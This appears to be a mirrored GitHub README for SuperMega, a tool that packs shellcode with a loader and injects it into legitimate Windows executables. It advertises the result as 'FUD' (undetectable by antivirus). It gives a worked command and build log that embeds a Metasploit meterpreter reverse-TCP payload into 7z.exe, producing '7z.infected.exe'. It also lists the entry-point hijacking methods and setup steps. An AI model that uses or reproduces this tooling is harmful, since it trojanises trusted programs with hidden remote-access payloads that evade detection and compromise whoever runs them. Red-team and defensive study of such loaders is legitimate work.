mirror of
https://github.com/dobin/SuperMega
synced 2026-06-02 17:27:10 +00:00
Dobin
6.3 KiB
6.3 KiB
SuperMega - Cordyceps Implementation
Ophiocordyceps camponoti-balzani is a species of fungus that parasitizes insect hosts of the order Hymenoptera, primarily ants. O. camponoti-balzani infects ants, and eventually kills the hosts after they move to an ideal location for the fungus to spread its spores.
Ophiocordyceps camponoti-balzani
What
SuperMega is a shellcode loader. It will take a shellcode as input, protects it, adds a loader, and injects the resulting shellcode into an exe.
FUD.
And:
- Only works with 64 bit (shellcode and infecteble exe's)
Features:
- Loader source is C yay
- Execution-Guardrails
- Environment variables
- configurable implementation
- different EXE injection techniques
Plugins:
- source style:
- PEB_WALK
- IAT_REUSE
- alloc style:
- RWX
- REUSE_RWX
- decoder style:
- PLAIN_1
- XOR_1
- dataref style:
- APPEND
Examples
Metasploit in 7z
Inject metasploit into 7z.exe. It will use PEB_WALK.
PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe
(supermega.py) Super Mega
(helper.py ) --[ Remove old files ]
(model.py ) --( Capabilities:
(model.py ) 0x0: GetEnvironmentVariableW (b'')
(model.py ) 0x460090: VirtualAlloc (b'')
(supermega.py) --[ SourceStyle: peb_walk
(compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ]
(compiler.py ) ---[ Make ASM from C: build\main.c ]
(compiler.py ) ---[ Fixup : build\main.asm ]
(compiler.py ) > Replace external reference at line: 8
(compiler.py ) > Replace external reference at line: 395
(compiler.py ) > Replace payload length at line: 389
(compiler.py ) > Add end of code label at line: 807
(compiler.py ) ---[ Cleanup: build\main.asm ]
(assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ]
(assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ]
(assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ]
(helper.py ) --[ Code section: .text
(helper.py ) > 0x1000 Code Size: 2557 (raw code section size: 2560)
(assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ]
(assembler.py) ---[ Size: Stager: 2557 and Payload: 449 Sum: 3006 ]
(injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ]
(supermega.py) --[ Start infected exe ]
rbmode
save,run
| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
| 3 - setup TLS callback
| 4 - hijack branching instruction at DLL Exported function (use -e to specify export to hook)
|
+-------------- 1 - store shellcode in the middle of a code section
2 - append shellcode to the PE file in a new PE section
Directories
shellcodes/: Input: Shellcodes we want to use as input (payload)source/: Input: Loader C templatesplugins/: Input: Loader C implementationsexes/: Input: Nonmalicious EXE files we inject intobuild/: build: Temporary files during build processlogs/: build: Files generated by building (inspect for debugging)out/: output. The generated result: infected exe
Installation
Paths
Configure config.yaml with:
- Path to Visual Studio 2022 compiler and assembler
- Path to mash_shc and runshc: https://github.com/hasherezade/masm_shc.
config.yaml:
path_cl: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\cl.exe'
path_ml64: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\ml64.exe'
path_masmshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_shc\masm_shc.exe'
path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe'
Make sure its the Hostx64/x64/ one exe. Make sure to compile
msmshc and runshc as 64bit. You can also replace runshc with
your own shellcode loader.
Environment Variables
Use
"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
or the VS developer console to find the damn environment variables, and set it in your python console. In my case:
$env:INCLUDE = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\VS\include;C:\Program Files (x86)\Windows Kits\10\include\10.0.22621.0\ucrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\um;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\winrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\cppwinrt;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\include\um"
$env:LIB="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\lib\um\x64;C:\Program Files (x86)\Windows Kits\10\lib\10.0.22621.0\ucrt\x64;C:\Program Files (x86)\Windows Kits\10\\lib\10.0.22621.0\\um\x64"
$env:LIBPATH="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x86\store\references;C:\Program Files (x86)\Windows Kits\10\UnionMetadata\10.0.22621.0;C:\Program Files (x86)\Windows Kits\10\References\10.0.22621.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
VS2022 Components
A list of packages/components which may be required for Visual Studio 2022:
- C++ 2022 Redistributable Update
- C++ Build Insights
- C++ CMake tools for windows
- C++ /CLI support for v143 build tools (lastest)
- MSBuild
- MSVC v133 - VS 2002 C++ x64/x86 build tools (latest)
- C++ ATL for latest v143 build tools (x86 & x64)
- C++ MFC for latest v143 build tools (x86 & x64)
- Windows 11 SDK